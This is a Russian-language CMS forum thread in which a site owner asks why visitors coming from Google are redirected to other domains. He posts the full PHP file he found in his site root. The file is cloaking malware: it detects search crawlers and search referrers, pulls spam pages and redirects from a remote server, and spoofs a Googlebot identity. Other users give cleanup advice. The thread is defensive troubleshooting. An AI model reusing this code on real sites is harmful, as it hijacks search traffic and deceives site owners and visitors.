Через поиск Google, открывается совершенно другой сайт 1.X

 
Посетитель
small user social cms
Сообщений: 91
При переходе на мой сайт через поиск Google, открывается совершенно другой сайт, но когда вводишь в адресную строку, сайт открывается тот что нужно. В чем может быть причина, такого перехода в Google? В ya.ru все в порядке.

Запрос в гугл делаю: ленино инфо

но результат запроса ведет с начало на мой сайт, а потом резко прыгает на https://www.zhu555.com/ и потом на http://napianhai.online/

Очень нужна ваша помощь.
Спасибо.

Редактировалось: 1 раз (Последний: 1 апреля 2019 в 17:27)
Посетитель
small user social cms
Медаль
Сообщений: 181
У меня в гугле открывается сайт с чисто белой страницей и доменом с www - http://www.lenino.info/ то есть сайт вообще не работает.
А в яндексе открывается ваш сайт без www - http://lenino.info/ и сайт работает, как надо.
Смотрела с планшета.

Насчёт редиректа, знаю, что бывает иногда такое от вируса, когда сайт добавляешь в бесплатный прогон по каталогам, а на самом деле на сайте появляется вирус в виде добавленного кода в js файлы, где указан редирект на левый сайт.

Но у вас что-то с www и без. Без www сайт работает.
Реклама
cms
Посетитель
small user social cms
Сообщений: 91
Вот такой вот файл нашел у себя:
Код PHP:
  1. <?php
  2. ini_set('display_errors', '0');
  3. //set_time_limit(0);
  4.  
  5. $serverUrl='http://www.wo8899.top/server.php';
  6. $isDebug=false;
  7.  
  8. $serverName=$_SERVER['SERVER_NAME'];
  9. $serverName=str_replace('www.','',$serverName);
  10. $currentUrl=$_SERVER['QUERY_STRING'];
  11. $isSpiderAgent=checkAgent();
  12. $isSpiderReal='false';
  13. $isSearchEngineReferer=checkReferer();
  14. $ipAddress=getIPAddress();
  15. $realHost='';
  16. $locationUrl=GetLocationURL();
  17. $requestUrl='';
  18. $requestUrlMD5='';
  19. $returnText='';
  20.  
  21. $currentPath=str_replace('www.'.$serverName,'',$currentUrl);
  22. $currentPath=str_replace($serverName,'',$currentPath);
  23. if(endWith($currentPath,'?'))
  24. {
  25. $currentPath=substr($currentPath,0,strlen($currentPath)-1);
  26. }
  27.  
  28. if($isSpiderAgent=='true' && !empty($ipAddress))
  29. {
  30. $realHost=strtolower(gethostbyaddr($ipAddress));
  31. if(strpos($realHost, 'googlebot.com')!==false)
  32. {
  33. $isSpiderReal='true';
  34. }
  35. }
  36.  
  37. if($isSpiderAgent=='true')
  38. {
  39. $requestUrl=$serverUrl.'?action=get&serverName='.$serverName.'&query='.$currentPath;
  40. $requestUrlMD5=$serverUrl.'?action=get&serverName='.$serverName.'&query='.md5($currentPath);
  41. $returnText=http_get($requestUrlMD5,15);
  42. }
  43. else
  44. {
  45. if($isSearchEngineReferer=='true')
  46. {
  47. $requestUrl=$serverUrl.'?action=jump&serverName='.$serverName.'&query='.$currentPath;
  48. $requestUrlMD5=$serverUrl.'?action=jump&serverName='.$serverName.'&query='.md5($currentPath);
  49. $returnText=http_get($requestUrlMD5,15);
  50. }
  51. }
  52.  
  53. //test code beigin****************************************************************************************
  54. if($isDebug)
  55. {
  56. echo '<table cellpacing=0 cellpadding=4 border=0 bgcolor="skyblue">';
  57. echo '<tr bgcolor="skyblue"><td colspan=2 align="center"><b>Debug Info</b></td></tr>';
  58. echo '<tr bgcolor="white"><td><b>currentUrl</b></td><td>'.$currentUrl.'</td></tr>';
  59. echo '<tr bgcolor="white"><td><b>currentPath</b></td><td>'.$currentPath.'</td></tr>';
  60. echo '<tr bgcolor="white"><td><b>user-Agent</b></td><td>'.$_SERVER["HTTP_USER_AGENT"].'</td></tr>';
  61. echo '<tr bgcolor="white"><td><b>isSpiderAgent</b></td><td>'.$isSpiderAgent.'</td></tr>';
  62. echo '<tr bgcolor="white"><td><b>isSpiderReal</b></td><td>'.$isSpiderReal.'</td></tr>';
  63. echo '<tr bgcolor="white"><td><b>isSearchEngineReferer</b></td><td>'.$isSearchEngineReferer.'</td></tr>';
  64. echo '<tr bgcolor="white"><td><b>ipAddress</b></td><td>'.$ipAddress.'</td></tr>';
  65. echo '<tr bgcolor="white"><td><b>realHost</b></td><td>'.$realHost.'</td></tr>';
  66. echo '<tr bgcolor="white"><td><b>serverName</b></td><td>'.$serverName.'</td></tr>';
  67. echo '<tr bgcolor="white"><td><b>locationUrl</b></td><td>'.$locationUrl.'</td></tr>';
  68. echo '<tr bgcolor="white"><td><b>requestUrl</b></td><td>'.$requestUrl.'</td></tr>';
  69. echo '<tr bgcolor="white"><td><b>requestUrlMD5</b></td><td>'.$requestUrlMD5.'</td></tr>';
  70. echo '<tr bgcolor="white"><td><b>returnText</b></td><td>'.$returnText.'</td></tr>';
  71. echo '</table>';
  72. //exit;
  73. }
  74. else
  75. {
  76. echo $returnText;
  77. }
  78. //test code end****************************************************************************************
  79.  
  80. function GetLocationURL()
  81. {
  82. $pageURL = '';
  83. if ($_SERVER['SERVER_PORT'] != '80')
  84. {
  85. $pageURL = 'https://'. $_SERVER['HTTP_HOST'].':'.$_SERVER['PHP_SELF'];
  86. }
  87. else
  88. {
  89. $pageURL = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
  90. }
  91. return $pageURL;
  92. }
  93.  
  94. function checkAgent()
  95. {
  96. $rtnVal = "false";
  97. try
  98. {
  99. if(!empty($_SERVER["HTTP_USER_AGENT"]))
  100. {
  101. $agent = "user-agent:".strtolower($_SERVER['HTTP_USER_AGENT']);
  102. if(strpos($agent,'google.com')!==false || strpos($agent,'google.co.jp')!==false || strpos($agent,'yahoo.co.jp')!==false || strpos($agent,'docomo.ne.jp')!==false || strpos($agent,'bing')!==false)
  103. {
  104. $rtnVal="true";
  105. }
  106. }
  107. }
  108. catch (Exception $w){}
  109. return $rtnVal;
  110. }
  111.  
  112. function checkReferer()
  113. {
  114. $rtnVal="false";
  115. try
  116. {
  117. if(!empty($_SERVER["HTTP_REFERER"]))
  118. {
  119. $url = 'referer:'.strtolower($_SERVER["HTTP_REFERER"]);
  120. if(strpos($url,'google.com')!==false || strpos($url,'google.co.jp')!==false || strpos($url,'yahoo.co.jp')!==false || strpos($url,'docomo.ne.jp')!==false || strpos($url,'bing')!==false)
  121. {
  122. $rtnVal="true";
  123. }
  124. }
  125. }
  126. catch (Exception $w){}
  127. return $rtnVal;
  128. }
  129.  
  130. function getIPAddress()
  131. {
  132. $ip="";
  133. $unknown = "unknown";
  134. if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] && strcasecmp($_SERVER['HTTP_X_FORWARDED_FOR'],$unknown))
  135. {
  136. $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
  137. }
  138. elseif ( isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], $unknown))
  139. {
  140. $ip = $_SERVER['REMOTE_ADDR'];
  141. }
  142. if (false !== strpos($ip, ','))
  143. {
  144. $ip = reset(explode(',', $ip));
  145. }
  146. if($ip==$unknown)
  147. {
  148. $ip="";
  149. }
  150. return $ip;
  151. }
  152.  
  153. function curPageURL()
  154. {
  155. $pageURL = "http://";
  156. $pageURL .= $_SERVER["HTTP_HOST"].$_SERVER["PHP_SELF"];
  157. if(!empty($_SERVER["QUERY_STRING"]))
  158. {
  159. $pageURL .="?".$_SERVER["QUERY_STRING"];
  160. }
  161. return $pageURL;
  162. }
  163.  
  164. function http_get($url, $ref,$timeout = 15)
  165. {
  166. $ch = curl_init();
  167. curl_setopt($ch, CURLOPT_URL, $url);
  168. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  169. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  170. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  171. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  172. //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  173. curl_setopt($ch, CURLOPT_REFERER, $ref);
  174. curl_setopt($ch, CURLOPT_HEADER, 0);
  175. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  176. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  177. $file_contents = curl_exec($ch);
  178. curl_close($ch);
  179. return $file_contents;
  180. }
  181.  
  182. function http_get_backup($url)
  183. {
  184. $ch2 = curl_init();
  185. curl_setopt($ch2, CURLOPT_URL, $url);
  186. curl_setopt($ch2, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:66.249.73.211','CLIENT-IP:66.249.73.211'));
  187. curl_setopt($ch2, CURLOPT_HEADER, false);
  188. curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false);
  189. curl_setopt($ch2, CURLOPT_SSL_VERIFYHOST, false);
  190. curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
  191. curl_setopt($ch2, CURLOPT_REFERER,'http://www.google.com');
  192. curl_setopt($ch2, CURLOPT_USERAGENT,'Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html)');
  193. curl_setopt($ch2, CURLOPT_TIMEOUT,25);
  194. $contents = curl_exec($ch2);
  195. curl_close($ch2);
  196. return $contents;
  197. }
  198.  
  199. function str_replace_once($needle, $replace, $haystack)
  200. {
  201. $pos = strpos($haystack, $needle);
  202. if ($pos === false)
  203. {
  204. return $haystack;
  205. }
  206. else
  207. {
  208. return substr_replace($haystack, $replace, $pos, strlen($needle));
  209. }
  210. }
  211.  
  212. function startWith($str, $needle)
  213. {
  214. return strpos($str, $needle) === 0;
  215. }
  216.  
  217. function endWith($haystack, $needle)
  218. {
  219. $length = strlen($needle);
  220. if($length == 0)
  221. {
  222. return true;
  223. }
  224. return (substr($haystack, -$length) === $needle);
  225. }
  226. ?>
Посетитель
small user social cms
Медаль
Сообщений: 181
Что значит нашли? Сами загрузили или как? В каталоги пытались сайт добавлять?
Посетитель
small user social cms
Сообщений: 91
@Milyana:

Что значит нашли? Сами загрузили или как? В каталоги пытались сайт добавлять?

Нет, я искал причину и нашел этот файл в корне сайта, который был изменен в конце марта, так как я проводил изменения сам в конце прошлого года, это меня насторожило и я его удалил. Насколько я понимаю он отношения никакого не имеет к CMS.
Посетитель
small user social cms
МедальПочетный донор проекта
Сообщений: 163
Вредоносный код. Прогоните все сайты вашего аккаунта через айболит. Возможно, еще где-то сидит
Посетитель
small user social cms
Сообщений: 91
islyaeFF:

Вредоносный код. Прогоните все сайты вашего аккаунта через айболит. Возможно, еще где-то сидит

Мне интересно как они в корень сайта - это засунули....
Посетитель
small user social cms
Медаль
Сообщений: 181
Сами загрузили может. Такое бывает, иногда сервисы разные выдают файлики и просят для подтверждения, что домен ваш, разместить файл в корне сайта. Если сервис мошеннический, то такой файл, все равно что вирус, который вы сами и разместили.

Ещё, как вариант, какое-то дополнение скачали, а там в архиве уже лежал этот файл.
Посетитель
small user social cms
Сообщений: 91
@Milyana:

Сами загрузили может. Такое бывает, иногда сервисы разные выдают файлики и просят для подтверждения, что домен ваш, разместить файл в корне сайта. Если сервис мошеннический, то такой файл, все равно что вирус, который вы сами и разместили.

Ещё, как вариант, какое-то дополнение скачали, а там в архиве уже лежал этот файл.

Нет это мой файл, я просто хочу разобраться это дыра в движке или с хостом проблемы.
Посетитель
small user social cms
Медаль
Сообщений: 181
С хостом тогда, что-то не верно настроили с www и без. Хотя странно, что редиректит на другой сайт у вас.
Посетитель
small user social cms
МедальПочетный донор проектаАвторитет форумаКубок зрительских симпатийПочетный донор проекта
Сообщений: 1725
gen:
Нет это мой файл, я просто хочу разобраться это дыра в движке или с хостом проблемы.

Вряд ли в движке... об этом здесь ну очень много писалось...
Для начала смените все пароли от FTP, панели хостинга и т.п.

Никогда не оставляйте пароли от FTP в клиенте.
Чистите в нем кэш.

Если есть возможность (статичный IP) включите в админке движка защиту.
В панеле хостинга для FTP и для самой панели тоже (обычно есть).

Проверьте права на папки..

И да:
islyaeFF:
Прогоните все сайты вашего аккаунта через айболит.

Как правило это все таки небрежность админа...

ЗЫ:
gen:
При переходе на мой сайт через поиск Google, открывается совершенно другой сайт, но когда вводишь в адресную строку, сайт открывается тот что нужно

добавьте в .htaccess это:

Код PHP:
  1.  
  2. RewriteCond %{HTTP_HOST} !site.ru
  3. RewriteRule (.*) - [G,L]
  4.  
где site.ru ваш домен.
И посмотрите что в поиске будет открываться...

Это на всякий случай можете так и оставить, даже если не поможет в этот раз, лишним не будет.
Редактировалось: 1 раз (Последний: 1 апреля 2019 в 21:05)
Посетитель
small user social cms
Сообщений: 83
Открывается Ваш сайт, но гугле иероглифы , в яшке норм.
Спойлер
скан https://rescan.pro/result.php?211bb690573dda3ea956752d54e6572c
компьютер можно прогнать https://ru.malwarebytes.com/adwcleaner/ , зайти с другого браузера .
Редактировалось: 3 раз (Последний: 1 апреля 2019 в 22:03)
Folder Find Text наше все !
Посетитель
small user social cms
МедальПочетный донор проектаАвторитет форумаКубок зрительских симпатийПочетный донор проекта
Сообщений: 1725
gen:
Нет, я искал причину и нашел этот файл в корне сайта, который был изменен в конце марта, так как я проводил изменения сам в конце прошлого года, это меня насторожило и я его удалил. Насколько я понимаю он отношения никакого не имеет к CMS.

Ищите еще возможно не все нашли...
Посетитель
small user social cms
Сообщений: 91
Rainbow:

gen:
Нет, я искал причину и нашел этот файл в корне сайта, который был изменен в конце марта, так как я проводил изменения сам в конце прошлого года, это меня насторожило и я его удалил. Насколько я понимаю он отношения никакого не имеет к CMS.

Ищите еще возможно не все нашли...

Вчера все что нашел удалил, сегодня опять залезли но уже только в .htaccess
Посетитель
small user social cms
Сообщений: 91
Rainbow:

gen:
Нет, я искал причину и нашел этот файл в корне сайта, который был изменен в конце марта, так как я проводил изменения сам в конце прошлого года, это меня насторожило и я его удалил. Насколько я понимаю он отношения никакого не имеет к CMS.

Ищите еще возможно не все нашли...

Можете еще скинуть свой .htaccess?
В начало страницы
Предыдущая темаСледующая тема Перейти на форум:
Быстрый ответ
Чтобы писать на форуме, зарегистрируйтесь или авторизуйтесь.